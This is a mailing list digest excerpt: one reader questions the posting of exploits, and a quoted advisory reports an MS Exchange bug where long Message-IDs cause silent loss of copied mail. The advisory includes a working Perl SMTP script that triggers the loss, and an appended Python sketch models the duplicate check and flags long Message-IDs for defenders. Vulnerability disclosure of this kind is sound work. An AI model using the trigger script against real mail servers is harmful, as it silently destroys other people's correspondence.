I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then he posts the "exploit" example because, in his own words,

> I think some people know how to use this "FEATURE" ... I hope this post
> will speed up the fix release!

Exactly in what way do you think this should speed up the release? Granted, this is a "lost" email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of "script kiddies" who would never be able to find the exploit but are part of the group who "know how to use this 'FEATURE'...". They watch here and elsewhere just for that purpose. Where is the accountability? I am torn between this issue of needed knowledge and exposed exploits. As a network administrator I have no need for the exploit, but for the knowledge. I have found no better place than here for that. Then, on the other hand, you all give out the exploits for confirmation, which is needed also. Just some of my personal inward ramblings.

Thank you,
Randall M

--__--__--

Message: 20
Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MS Exchange message lost

* MS Exchange duplicate message fault (message lost)
*
* MS Exchange (all versions affected) duplicate message fault
*
* I discovered this bug independently in 10.2003
*
* public post 05.2004
*
* Helmut Schmitz < [EMAIL PROTECTED] >
*
* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */

MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
messages with long Message-IDs (>189 bytes?) to more than one recipient
(Cc), the message will not be delivered correctly ... there is no correct
logging!!, the message will be delivered to only one recipient ... the
message to the other will be lost!!

I have sent this issue to Microsoft (10.2003) ... some months later
(05.2004) I got the fix, but not publicly ... store.exe (6.5.6980.81) with
some registry settings fixes (workaround ;-) the problem.

Perl example (test exploit) ...

#!/usr/bin/perl -w
# Test exploit from the post: one message to two recipients (To + Cc)
# carrying a Message-ID far longer than the reported ~189-byte threshold.
use strict;
use Net::SMTP;

my $from    = '[EMAIL PROTECTED]';
my $to      = '[EMAIL PROTECTED]';
my $cc      = '[EMAIL PROTECTED]';
my $subject = 'Test Email';

# The over-long Message-ID is the trigger. It is kept on a single line so
# the header is sent unfolded (the mail-wrapped copy in the post split it).
my $msgid = '<veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengeifeejktmhedgedherngrondljzhng>';

my $smtp = Net::SMTP->new('yourmailserver')
    or die "cannot connect to mail server: $!";

# Envelope: one sender, two recipients (the Cc recipient is the one that
# loses the message according to the post).
$smtp->mail($from);
$smtp->to($to);
$smtp->cc($cc);

$smtp->data();
$smtp->datasend("To: <$to>\n");
$smtp->datasend("Cc: <$cc>\n");
$smtp->datasend("From: <$from>\n");
$smtp->datasend("Subject: $subject\n");
$smtp->datasend("Message-ID: $msgid\n");
$smtp->datasend("\n");    # blank line separates headers from body
$smtp->datasend("Hallo\n");
$smtp->datasend("123\n");
$smtp->datasend("123\n");
$smtp->datasend("123\n");
$smtp->dataend();
$smtp->quit;

Background:
Duplicate detection is decided by three factors. These are MessageID,
RootFID (the root folder ID of the mailbox) and the SubmitTime into the
store. These are used to build a unique key when the message is
submitted. If all the factors are the same value, then we recognize the
message as a duplicate.

###################################

I think some people know how to use this "FEATURE" ... I hope this post
will speed up the fix release!

Regards,
Helmut Schmitz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
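The duplicate-detection rule quoted in the Background paragraph and the over-long Message-ID trigger described above, as an added example in Python (not code from the post, and not Exchange's own implementation): it builds a key from the three named factors (MessageID, RootFID, SubmitTime) over a toy in-memory store, and adds the header check a mail administrator would want, which unfolds a folded Message-ID from a raw RFC 2822 message and measures its byte length against the post's reported 189-byte threshold. The function and class names, the use of SHA-256 to combine the three factors, the 70-column folding, and the sample messages and addresses are assumptions constructed for illustration.

```python
import hashlib
import re

# The post's reported trigger: Message-IDs over roughly this many bytes.
MESSAGE_ID_LIMIT = 189


def dedup_key(message_id, root_fid, submit_time):
    """Combine the three factors the post names (MessageID, RootFID,
    SubmitTime) into one key.  Hashing them is an assumption made here;
    the post only says the three values form a unique key."""
    h = hashlib.sha256()
    for part in (message_id, root_fid, submit_time):
        h.update(part.encode("utf-8"))
        h.update(b"\x00")  # separator so parts cannot run together
    return h.hexdigest()


class Store:
    """Toy mailbox store (constructed for illustration) applying the rule:
    a submission whose key was already seen is treated as a duplicate."""

    def __init__(self):
        self.seen = set()
        self.delivered = []

    def submit(self, message_id, root_fid, submit_time):
        key = dedup_key(message_id, root_fid, submit_time)
        if key in self.seen:
            return False  # recognised as duplicate, not stored again
        self.seen.add(key)
        self.delivered.append((root_fid, message_id))
        return True


def message_id_value(raw):
    """Return the Message-ID from a raw RFC 2822 message, with header
    folding undone (a CRLF that precedes WSP is removed) and all remaining
    whitespace dropped, since a msg-id cannot legitimately contain any."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    unfolded = re.sub(rb"\r\n(?=[ \t])", b"", head)
    for line in unfolded.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"message-id":
            return b"".join(value.split())
    return b""


def exceeds_limit(raw, limit=MESSAGE_ID_LIMIT):
    """True when the message's Message-ID is longer than the reported threshold."""
    return len(message_id_value(raw)) > limit


def build_message(message_id, fold_at=70):
    """Constructed sample message.  The Message-ID is folded every
    `fold_at` characters, like the wrapped one in the post."""
    chunks = [message_id[i:i + fold_at] for i in range(0, len(message_id), fold_at)]
    folded = "\r\n ".join(chunks)
    headers = (
        "From: <sender@example.test>\r\n"
        "To: <alice@example.test>\r\n"
        "Cc: <bob@example.test>\r\n"
        "Subject: Test Email\r\n"
        f"Message-ID: {folded}\r\n"
    )
    return (headers + "\r\n" + "Hallo\r\n123\r\n").encode("ascii")


LONG_ID = "<" + "x" * 200 + "@example.test>"   # 215 bytes, over the threshold
SHORT_ID = "<short@example.test>"               # 20 bytes


if __name__ == "__main__":
    for label, mid in (("short", SHORT_ID), ("long", LONG_ID)):
        raw = build_message(mid)
        print(f"{label}: {len(message_id_value(raw))} bytes, "
              f"over limit: {exceeds_limit(raw)}")

    store = Store()
    t = "2004-05-12T11:52:23+0200"
    print(store.submit(SHORT_ID, "rootfid-alice", t))  # first copy: stored
    print(store.submit(SHORT_ID, "rootfid-alice", t))  # same key: dropped
    print(store.submit(SHORT_ID, "rootfid-bob", t))    # other mailbox: stored
```

Running the script shows the long folded Message-ID coming back as a single 215-byte value and being flagged, and the store dropping only a resubmission whose three factors all match. The model deliberately stops at what the post states; it does not reproduce the actual Exchange fault, and any real check should be run against captured messages from the transport logs rather than the constructed samples here.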